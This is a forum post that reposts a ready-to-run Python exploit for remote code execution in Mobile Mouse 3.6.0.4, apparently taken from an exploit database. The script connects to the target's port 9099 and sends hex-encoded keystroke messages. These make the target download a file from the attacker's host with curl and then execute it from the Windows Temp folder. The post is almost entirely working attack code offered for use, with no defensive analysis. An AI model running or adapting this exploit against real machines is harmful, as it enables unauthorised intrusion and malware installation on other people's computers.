Jump to content
Kev

Mobile Mouse 3.6.0.4 Remote Code Execution Exploit

Recommended Posts

 

# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 Enterprise LTSC Build 17763
 
#!/usr/bin/env python3
 
import socket
from time import sleep
import argparse
 
help = " Mobile Mouse 3.6.0.4 Remote Code Execution "
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File name to Upload")
parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1")
 
args = parser.parse_args()
 
host = args.target
command_shell = args.file
lhost = args.lhost
port = 9099 # Default Port
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
 
CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B7269
68616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
run = s.recv(54)
 
RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
run = s.recv(54)
 
sleep(0.5)
 
download_string= f"curl http://{lhost}:8080/{command_shell} -o
c:\Windows\Temp\{command_shell}".encode('utf-8')
hex_shell = download_string.hex()
SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" +
"4b45591e2d311e454e5445521e04")
s.send(SHELL)
shell = s.recv(96)
 
print ("Executing The Command Shell...")
sleep(5)
RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN2)
run2 = s.recv(54)
sleep(0.8)
shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8')
hex_run = shell_string.hex()
RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" +
"4b45591e2d311e454e5445521e04")
s.send(RUN3)
run3 = s.recv(96)
 
print (" Take The Rose")
 
sleep(50)
s.close()
 
#  0day.today [2022-09-11]  #

 

Source: 0day.today

  • Like 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...